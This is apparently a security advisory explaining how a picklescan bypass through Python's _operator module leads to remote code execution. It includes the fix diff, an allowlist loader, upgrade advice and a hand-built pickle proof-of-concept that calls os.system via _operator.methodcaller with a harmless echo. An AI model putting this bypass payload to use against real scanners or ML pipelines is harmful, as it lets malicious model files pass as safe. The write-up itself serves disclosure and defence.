Picklescan, a security scanner for Python pickle files, had a blind spot. It didn't check for dangerous functions in the C-optimized `_operator` module. This allowed attackers to craft malicious pickles that bypassed the scan and achieved Remote Code Execution. Update to version 0.0.34 immediately.
The Picklescan library, a tool designed to detect malicious Python pickle files, contained a critical vulnerability allowing for Remote Code Execution (RCE). The flaw stemmed from an incomplete blacklist that failed to account for dangerous functions within Python's C-optimized `_operator` module. Attackers could craft a pickle payload using `_operator.methodcaller` or `_operator.attrgetter` to bypass Picklescan's checks, leading to arbitrary command execution when the seemingly 'safe' file was deserialized by a victim application.
Ah, Python's pickle module. The duct tape of data serialization. It's quick, it's easy, and it's a security nightmare waiting to happen. Deserializing a pickle is functionally equivalent to running arbitrary code, making it one of the most notorious footguns in the Python ecosystem. Anyone who tells you to pickle.load() data from an untrusted source is either a rookie or trying to get you fired.
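To make the "loading is executing" point concrete, here is a minimal, harmless sketch. The class name `Innocent` is made up for illustration, and `sorted` stands in for whatever callable an attacker would actually choose.

```python
import pickle


class Innocent:
    """Hypothetical class whose pickle asks the loader to call a function."""

    def __reduce__(self):
        # pickle records "call sorted([3, 1, 2])" instead of the object's state.
        # An attacker would return a dangerous callable and its arguments here.
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(Innocent())

# Loading does not rebuild an Innocent instance. It calls sorted() and
# hands back whatever that call produced.
result = pickle.loads(data)
print(type(result).__name__, result)
```

The loader never asks whether the callable is sensible. It simply invokes what the byte stream names, which is why the choice of callable is the whole game.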
To solve this, heroes emerge with tools like picklescan. Its mission is noble: to statically analyze a pickle file's bytecode and identify dangerous opcodes or calls to unsafe functions like os.system before you naively load it into memory. It acts as a bouncer, checking IDs at the door to keep the malicious riff-raff out.
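The idea of inspecting a pickle without loading it can be sketched with the standard library's `pickletools.genops`. This is not picklescan's actual implementation; `referenced_globals` is a hypothetical helper, and its handling of `STACK_GLOBAL` is a deliberate simplification.

```python
import os
import pickle
import pickletools


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Return (module, name) pairs a pickle would import, without loading it."""
    found = []
    strings = []  # string arguments seen so far, needed for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols carry "module name" directly in the opcode argument.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Simplification: assume the two most recent strings are the
            # module and the attribute name. A real scanner tracks the stack.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


# Pickling os.system by reference is harmless; nothing is executed here.
# On Linux the module is expected to show up under its alias, posix.
print(referenced_globals(pickle.dumps(os.system)))
```

Everything a scanner like this can do depends on what it compares those `(module, name)` pairs against.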
This is especially critical in the world of Machine Learning, where models are passed around like candy, often serialized as... you guessed it, pickle files. A tool like picklescan provides a desperately needed layer of security, giving developers the confidence to load third-party models without handing over the keys to their kingdom. But what happens when the bouncer has a blind spot?
The Achilles' heel of any blacklist-based security tool is the simple fact that you can only block what you know. If an attacker finds a new trick, a new gadget, or an overlooked pathway, the entire security model collapses. This is precisely what happened to picklescan.
The developers diligently blacklisted dangerous functions from the standard Python operator module, such as methodcaller and attrgetter. These are powerful tools that, in the wrong hands, can be used to fetch arbitrary attributes and call arbitrary methods on any object. However, they overlooked one crucial detail: CPython often ships C-accelerated implementations of standard library modules for performance. The operator module has a C-based twin named _operator, and on CPython the public module simply re-exports the twin's functions.
This is like a high-security facility having photos of every known criminal, but failing to account for their identical twin. An attacker could simply point the GLOBAL opcode (the letter c, which shows up in the raw payload as c_operator) at the _operator module to reach the very same functions. Since _operator wasn't on the naughty list, picklescan saw no evil, heard no evil, and reported the malicious file as perfectly safe. The front door was locked, but the side window, conveniently labeled _operator, was wide open.
Code tells the story best. The vulnerability lived in src/picklescan/scanner.py, inside a dictionary named _unsafe_globals. This dictionary is the bouncer's list of troublemakers. Before the fix, it was blissfully unaware of the _operator module's existence.
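The gap, and the effect of adding the missing key, can be sketched with a trimmed-down stand-in for that dictionary. The names `blocklist_before`, `blocklist_after`, and `is_flagged` are hypothetical, and the matching rule is an assumption about how such a lookup might work rather than a copy of the scanner's code.

```python
# Hypothetical, trimmed-down stand-ins for the scanner's blocklist.
# "*" means every name in the module is considered unsafe.
OPERATOR_GADGETS = {"attrgetter", "itemgetter", "methodcaller"}

blocklist_before = {
    "nt": "*",
    "posix": "*",
    "operator": OPERATOR_GADGETS,
}
blocklist_after = {**blocklist_before, "_operator": OPERATOR_GADGETS}


def is_flagged(blocklist, module, name):
    """Assumed matching rule: exact module key, then wildcard or name lookup."""
    entry = blocklist.get(module)
    if entry is None:
        return False
    return entry == "*" or name in entry


print(is_flagged(blocklist_before, "operator", "methodcaller"))   # True
print(is_flagged(blocklist_before, "_operator", "methodcaller"))  # False
print(is_flagged(blocklist_after, "_operator", "methodcaller"))   # True
```

The middle line is the whole vulnerability: an exact-match lookup has no notion that two module names can lead to the same function.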
The patch, committed in f2dea43e0c838e09ace1e62994143254b51de927, is beautifully simple and terrifyingly revealing. It adds just a few lines to the blacklist.
--- a/src/picklescan/scanner.py
+++ b/src/picklescan/scanner.py
@@ -127,6 +129,11 @@
"numpy.testing._private.utils": "*", # runstring() in this module is a synonym for exec()
"nt": "*", # Alias for 'os' on Windows. Includes os.system()
"posix": "*", # Alias for 'os' on Linux. Includes os.system()
+ "_operator": {
+ "attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned")
+ "itemgetter",
+ "methodcaller",
+ },
"operator": {
"attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned")
"itemgetter",That's it. The addition of the _operator dictionary key, with its dangerous callables attrgetter and methodcaller, closes the loophole. It's a stark reminder that in security, completeness is everything. Missing a single, obscure variant of a dangerous function is all it takes for a determined attacker to walk right past your defenses.
So, how does an attacker turn this oversight into a shell? The PoC is a masterclass in pickle bytecode manipulation. Since pickle.dumps() is too high-level to create this specific payload, it has to be built manually, opcode by opcode. It's the assembly language of Python serialization.
Let's look at the payload:
opcode2 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
methodcaller
(Vsystem
Vecho "pwned by _operator.methodcaller"
tR(g0
tR.'''

This isn't just a string; it's a program. The pickletools.dis() function can help us decode it. The payload first pushes the builtins.__import__ function onto the stack and calls it with the argument 'os', effectively getting a handle to the os module, which it stashes in memo slot 0 (p0) before popping it off the stack. Then, it uses the GLOBAL opcode (c) followed by the module name _operator to grab _operator.methodcaller. It configures methodcaller with the method name system and the shell command as its argument. Finally, it fetches the os module back from the memo (g0) and applies the configured methodcaller to it, executing os.system('echo "pwned..."'). Voila, RCE.
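The walkthrough above can be reproduced safely, since disassembling a pickle never executes it. The sketch below feeds the article's payload bytes to `pickletools.dis` and then shows the same call shape with a harmless method; the variable names are illustrative only.

```python
import io
import operator
import os
import pickletools

# The proof-of-concept bytes from the article. They are only disassembled
# here, never passed to pickle.load() or pickle.loads().
payload = (
    b"cbuiltins\n__import__\n"
    b"(Vos\ntRp0\n"
    b"0c_operator\nmethodcaller\n"
    b"(Vsystem\n"
    b'Vecho "pwned by _operator.methodcaller"\n'
    b"tR(g0\n"
    b"tR."
)

listing = io.StringIO()
pickletools.dis(payload, out=listing)  # one line per opcode, with arguments
print(listing.getvalue())

# Harmless analog of the gadget: methodcaller(name, *args)(obj) behaves like
# obj.name(*args). The payload does the same with "system" and a shell command.
call_getcwd = operator.methodcaller("getcwd")
print(call_getcwd(os) == os.getcwd())
```

In the listing, the two GLOBAL lines are the only places where the payload names something importable, which is exactly the information a blocklist-based scanner has to work with.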
To a vulnerable version of picklescan, this looks fine. It sees __import__ which is suspicious, but it completely misses the _operator.methodcaller gadget that ties it all together into a weapon. The scanner flags a minor warning but misses the critical RCE vector, giving the user a false sense of security.
The impact here is as bad as it gets: total system compromise. An attacker can package this malicious pickle file into a format that a victim would trust, like a pre-trained machine learning model from a public repository.
Imagine a data scientist downloading the latest, greatest AI model to analyze some data. They do their due diligence and run picklescan on the .pkl file. The scanner says, "Looks a bit suspicious, but no major threats detected!" The data scientist, reassured, loads the model with pickle.load(). In the background, their server connects back to an attacker's C2, and their company's proprietary data starts streaming out. Game over.
This isn't theoretical. The entire MLOps pipeline, from model sharing to deployment, is built on a foundation of trust that often involves pickle files. A vulnerability like this undermines that foundation. It turns a helpful security tool into an unwitting accomplice, assuring victims that the Trojan horse they're wheeling into their datacenter is just a lovely wooden statue.
The immediate fix is simple: upgrade picklescan to version 0.0.34 or later. This version adds _operator to its blacklist, slamming the door on this specific exploit vector. Do it now.
pip install --upgrade picklescan

But let's be real. The core problem isn't this specific bug; it's the fragile security model of blacklisting dangerous things in a format as powerful as pickle. As the original researchers noted, there could be other gadgets lurking in the standard library, other obscure modules or clever chains of 'safe' operations that lead to RCE. The next bypass is always just one creative hacker away.
The real lessons are harsher. First, never, ever deserialize data from a source you don't 100% control and trust. Second, if you must handle untrusted pickles, do it in a heavily sandboxed, disposable environment with no network access and minimal privileges. Third, and most importantly, consider using safer serialization formats. JSON, Protobuf, or even yaml.safe_load() don't have the arbitrary code execution capabilities that make pickle so treacherous. It might be time to let pickle go.
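For cases where pickle cannot be avoided, the opposite of a blocklist is an allowlist enforced at load time. The sketch below follows the "restricting globals" pattern from the Python documentation and is not something picklescan does; `SAFE_BUILTINS`, `RestrictedUnpickler`, and `restricted_loads` are illustrative names, and the allowed set is an arbitrary example.

```python
import builtins
import io
import pickle

# Example allowlist; anything not named here is refused, known gadget or not.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle tries to import a global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but only allowlisted globals may be resolved."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data and allowlisted types load normally.
print(restricted_loads(pickle.dumps([1, 2, range(3)])))

# A bare reference to the gadget is refused before anything can be called.
try:
    restricted_loads(b"c_operator\nmethodcaller\n.")
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

With this shape, an overlooked module such as `_operator` fails closed instead of failing open. It is still no substitute for the sandboxing and format changes described above.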
| Product | Affected Versions | Fixed Version |
|---|---|---|
| picklescan (mmaitre314) | < 0.0.34 | 0.0.34 |
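The version boundary in the table can be checked programmatically. This is a minimal sketch: `parse_version` and `is_patched` are hypothetical helpers that assume purely numeric, dot-separated version strings, so pre-release suffixes would need a proper version parser.

```python
from importlib import metadata

FIXED_VERSION = "0.0.34"  # first fixed release, per the table above


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '0.0.34' into (0, 0, 34). Assumes numeric components only."""
    return tuple(int(part) for part in version.split("."))


def is_patched(installed: str, fixed: str = FIXED_VERSION) -> bool:
    return parse_version(installed) >= parse_version(fixed)


try:
    installed = metadata.version("picklescan")
    print(installed, "patched" if is_patched(installed) else "VULNERABLE")
except metadata.PackageNotFoundError:
    print("picklescan is not installed in this environment")
```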
| Attribute | Detail |
|---|---|
| CWE ID | CWE-502 |
| Weakness | Deserialization of Untrusted Data |
| Attack Vector | Network / File |
| CVSSv3.1 Score | 9.3 (Critical) |
| Impact | Remote Code Execution |
| Exploit Status | Proof-of-Concept Available |
| KEV Status | Not Listed |
The software deserializes untrusted data without sufficiently verifying that the resulting data will be valid, leading to arbitrary code execution.